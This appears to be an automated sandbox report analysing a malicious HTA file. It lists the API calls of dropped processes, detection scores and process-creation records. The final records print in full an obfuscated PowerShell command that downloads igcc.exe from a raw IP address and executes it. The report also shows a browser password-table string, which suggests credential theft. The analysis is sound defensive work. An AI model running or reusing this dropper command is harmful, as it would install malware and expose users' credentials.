                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72AB0 NtWaitForSingleObject,13_2_03A72AB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72AF0 NtWriteFile,13_2_03A72AF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72AD0 NtReadFile,13_2_03A72AD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A739B0 NtGetContextThread,13_2_03A739B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72FA0 NtQuerySection,13_2_03A72FA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72FB0 NtResumeThread,13_2_03A72FB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72F90 NtProtectVirtualMemory,13_2_03A72F90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72FE0 NtCreateFile,13_2_03A72FE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72F30 NtCreateSection,13_2_03A72F30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72F60 NtCreateProcessEx,13_2_03A72F60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72EA0 NtAdjustPrivilegesToken,13_2_03A72EA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72E80 NtReadVirtualMemory,13_2_03A72E80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72EE0 NtQueueApcThread,13_2_03A72EE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72E30 NtWriteVirtualMemory,13_2_03A72E30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72DB0 NtEnumerateKey,13_2_03A72DB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72DD0 NtDelayExecution,13_2_03A72DD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72D30 NtUnmapViewOfSection,13_2_03A72D30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72D00 NtSetInformationFile,13_2_03A72D00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72D10 NtMapViewOfSection,13_2_03A72D10
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A73D10 NtOpenProcessToken,13_2_03A73D10
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A73D70 NtOpenThread,13_2_03A73D70
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72CA0 NtQueryInformationToken,13_2_03A72CA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72CF0 NtOpenProcess,13_2_03A72CF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72CC0 NtQueryVirtualMemory,13_2_03A72CC0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72C00 NtQueryInformationProcess,13_2_03A72C00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72C60 NtCreateKey,13_2_03A72C60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A72C70 NtFreeVirtualMemory,13_2_03A72C70
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,12_2_0007A1EF
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00068310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00068310
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_000751BD
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0001E6A012_2_0001E6A0
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003D97512_2_0003D975
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0001FCE012_2_0001FCE0
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000321C512_2_000321C5
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000462D212_2_000462D2
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000903DA12_2_000903DA
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0004242E12_2_0004242E
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000325FA12_2_000325FA
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0006E61612_2_0006E616
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000266E112_2_000266E1
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0004878F12_2_0004878F
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0002880812_2_00028808
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0004684412_2_00046844
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0009085712_2_00090857
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007888912_2_00078889
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003CB2112_2_0003CB21
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00046DB612_2_00046DB6
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00026F9E12_2_00026F9E
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0002303012_2_00023030
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003318712_2_00033187
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003F1D912_2_0003F1D9
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0001128712_2_00011287
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003148412_2_00031484
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0002552012_2_00025520
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003769612_2_00037696
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0002576012_2_00025760
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003197812_2_00031978
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00031D9012_2_00031D90
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0003BDA612_2_0003BDA6
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00097DDB12_2_00097DDB
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0001DF0012_2_0001DF00
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00023FE012_2_00023FE0
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0145557012_2_01455570
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0041899313_2_00418993
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0042F04313_2_0042F043
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0040287013_2_00402870
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0041017A13_2_0041017A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0041018313_2_00410183
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0040319013_2_00403190
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0040124013_2_00401240
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0040E38313_2_0040E383
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_00416B8F13_2_00416B8F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_00416B9313_2_00416B93
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_004103A313_2_004103A3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_00402C7413_2_00402C74
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0040E4C713_2_0040E4C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0040E4D313_2_0040E4D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_00402C8013_2_00402C80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0040E51C13_2_0040E51C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_004045E413_2_004045E4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_004047A513_2_004047A5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A8739A13_2_03A8739A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4E3F013_2_03A4E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B003E613_2_03B003E6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF132D13_2_03AF132D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2D34C13_2_03A2D34C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFA35213_2_03AFA352
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A452A013_2_03A452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C013_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE027413_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4B1B013_2_03A4B1B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B001AA13_2_03B001AA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF81CC13_2_03AF81CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3010013_2_03A30100
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADA11813_2_03ADA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A7516C13_2_03A7516C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F17213_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0B16B13_2_03B0B16B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF70E913_2_03AF70E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFF0E013_2_03AFF0E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEF0CC13_2_03AEF0CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C013_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFF7B013_2_03AFF7B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3C7C013_2_03A3C7C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4077013_2_03A40770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6475013_2_03A64750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5C6E013_2_03A5C6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF16CC13_2_03AF16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADD5B013_2_03ADD5B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0059113_2_03B00591
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4053513_2_03A40535
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF757113_2_03AF7571
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEE4F613_2_03AEE4F6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFF43F13_2_03AFF43F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3146013_2_03A31460
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF244613_2_03AF2446
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5FB8013_2_03A5FB80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A7DBF913_2_03A7DBF9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF6BD713_2_03AF6BD7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFFB7613_2_03AFFB76
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFAB4013_2_03AFAB40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADDAAC13_2_03ADDAAC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A85AA013_2_03A85AA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3EA8013_2_03A3EA80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEDAC613_2_03AEDAC6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB3A6C13_2_03AB3A6C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFFA4913_2_03AFFA49
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF7A4613_2_03AF7A46
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A429A013_2_03A429A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0A9A613_2_03B0A9A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5696213_2_03A56962
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4995013_2_03A49950
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B95013_2_03A5B950
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A268B813_2_03A268B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A438E013_2_03A438E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6E8F013_2_03A6E8F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4284013_2_03A42840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4A84013_2_03A4A840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFFFB113_2_03AFFFB1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A41F9213_2_03A41F92
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4CFE013_2_03A4CFE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A32FC813_2_03A32FC8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A60F3013_2_03A60F30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFFF0913_2_03AFFF09
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB4F4013_2_03AB4F40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A49EB013_2_03A49EB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A52E9013_2_03A52E90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFCE9313_2_03AFCE93
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFEEDB13_2_03AFEEDB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFEE2613_2_03AFEE26
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40E5913_2_03A40E59
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A58DBF13_2_03A58DBF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3ADE013_2_03A3ADE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5FDC013_2_03A5FDC0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4AD0013_2_03A4AD00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF7D7313_2_03AF7D73
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A43D4013_2_03A43D40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF1D5A13_2_03AF1D5A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0CB513_2_03AE0CB5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A30CF213_2_03A30CF2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFFCF213_2_03AFFCF2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB9C3213_2_03AB9C32
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A40C0013_2_03A40C00
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4360B15_2_06A4360B
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4365415_2_06A43654
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A3971C15_2_06A3971C
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A434BB15_2_06A434BB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4BCC715_2_06A4BCC7
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4BCCB15_2_06A4BCCB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A454DB15_2_06A454DB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A435FF15_2_06A435FF
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A452B215_2_06A452B2
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A452BB15_2_06A452BB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4DACB15_2_06A4DACB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4A3FB15_2_06A4A3FB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A398DD15_2_06A398DD
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A6417B15_2_06A6417B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 84 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 266 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 88 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 36 times
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: String function: 00038900 appears 42 times
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: String function: 00017DE1 appears 35 times
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: String function: 00030AE3 appears 70 times
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@18/16@18/12
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007A06A GetLastError,FormatMessageW,12_2_0007A06A
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000681CB AdjustTokenPrivileges,CloseHandle,12_2_000681CB
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_000687E1
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,12_2_0007B333
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0008EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_0008EE0D
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007C397 CoInitialize,CoCreateInstance,CoUninitialize,12_2_0007C397
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00014E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_00014E89
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ima4unv.jsq.ps1Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: AtBroker.exe, 00000010.00000002.3664527850.0000000003448000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: njo.htaVirustotal: Detection: 40%
                  Source: njo.htaReversingLabs: Detection: 27%
                  Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\njo.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline"
